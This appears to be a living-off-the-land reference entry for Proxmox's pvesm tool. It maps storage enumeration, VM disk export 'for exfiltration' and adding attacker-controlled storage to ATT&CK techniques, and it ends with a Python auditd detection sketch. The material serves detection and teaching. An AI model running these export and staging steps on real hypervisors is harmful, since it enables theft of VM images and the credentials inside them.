.. /pvesm

Discovery
Exfiltration
Persistence

pvesm (Proxmox VE Storage Manager) manages storage resources in Proxmox VE including local, NFS, iSCSI, Ceph, and ZFS storage. Adversaries can use pvesm to enumerate storage infrastructure, locate VM disk images and backups, and identify sensitive data locations for exfiltration.

Discovery

  1. Display status of all storage resources including type, content types, and available space.

    pvesm status
    Use Case: Enumerate all storage backends to understand where VM images and backups are stored.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1082
  2. List contents of a specific storage showing VM images, templates, backups, and ISOs.

    pvesm list {storage}
    Use Case: Discover backup files and VM disk images for potential exfiltration or tampering.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1082
  3. Get the filesystem path for a storage volume.

    pvesm path {storage}:{content}/{volname}
    Use Case: Resolve storage paths for direct disk access and manipulation.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1082
  4. Scan an NFS server for available exports.

    pvesm scan nfs {server}
    Use Case: Discover accessible NFS shares for lateral movement or additional storage targets.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1135
  5. Scan an iSCSI portal for available targets.

    pvesm scan iscsi {portal}
    Use Case: Discover accessible iSCSI targets for storage enumeration or lateral movement.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1082

Exfiltration

  1. Export a storage volume to a file.

    pvesm export {volume} {format} {filename}
    Use Case: Exfiltrate VM disk images or backups for offline analysis or credential extraction.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1567

Persistence

  1. Add a new storage resource to Proxmox.

    pvesm add {type} {storage} --path {path}
    Use Case: Add attacker-controlled storage for staging or exfiltration.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1074
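
Detection sketch for the commands listed on this page, added here as an example and not part of the original entry or of Proxmox itself: it reads auditd EXECVE records and tags each pvesm invocation with the category and technique ID this page assigns to it. It assumes execve auditing is enabled on the host and that the script may be logged either directly or behind its interpreter; the function names and the sample records are constructed for illustration.

```python
import re
# Subcommand -> (category, ATT&CK technique), exactly as this page assigns them.
PVESM_MAP = {
    ("status",): ("Discovery", "T1082"),
    ("list",): ("Discovery", "T1082"),
    ("path",): ("Discovery", "T1082"),
    ("scan", "nfs"): ("Discovery", "T1135"),
    ("scan", "iscsi"): ("Discovery", "T1082"),
    ("export",): ("Exfiltration", "T1567"),
    ("add",): ("Persistence", "T1074"),
}
ARG_RE = re.compile(r'\ba(\d+)=("([^"]*)"|(?:[0-9A-Fa-f]{2})+)')

SAMPLE_LOG = [  # constructed records, not captured from a real host
    'type=EXECVE msg=audit(1700000000.101:901): argc=2 a0="pvesm" a1="status"',
    'type=EXECVE msg=audit(1700000001.202:902): argc=5 a0="/usr/bin/perl" a1="/usr/sbin/pvesm" a2="scan" a3="nfs" a4="192.0.2.10"',
    'type=EXECVE msg=audit(1700000002.303:903): argc=5 a0="pvesm" a1="export" a2="local:100/vm-100-disk-0.qcow2" a3="qcow2+size" a4=2F746D702F6F75742066696C65',
    'type=EXECVE msg=audit(1700000003.404:904): argc=6 a0="pvesm" a1="add" a2="dir" a3="stage" a4="--path" a5="/mnt/x"',
    'type=EXECVE msg=audit(1700000004.505:905): argc=2 a0="ls" a1="/etc/pve"',
]

def parse_execve(record):
    """Return argv from one auditd EXECVE record, or None for other record types."""
    if not record.startswith("type=EXECVE"):
        return None
    # auditd quotes plain arguments and hex-encodes those with spaces or control bytes.
    args = {int(i): q if raw.startswith('"') else bytes.fromhex(raw).decode("utf-8", "replace")
            for i, raw, q in ARG_RE.findall(record)}
    return [args[i] for i in sorted(args)]

def classify(argv):
    """Map an argv to the page's (category, technique); None if not a listed pvesm call."""
    # The script may appear behind its interpreter, so find pvesm by basename.
    pos = next((i for i, a in enumerate(argv[:3]) if a.rsplit("/", 1)[-1] == "pvesm"), None)
    if pos is None:
        return None
    sub = tuple(argv[pos + 1:pos + 3])
    return PVESM_MAP.get(sub) or PVESM_MAP.get(sub[:1])

def scan(lines):
    """Return (category, technique, argv) for each matching record."""
    hits = []
    for argv in filter(None, map(parse_execve, lines)):
        verdict = classify(argv)
        if verdict:
            hits.append((*verdict, argv))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Discovery subcommands are routine on a managed cluster, so the export and add hits are the ones most worth correlating with the invoking account and the destination path.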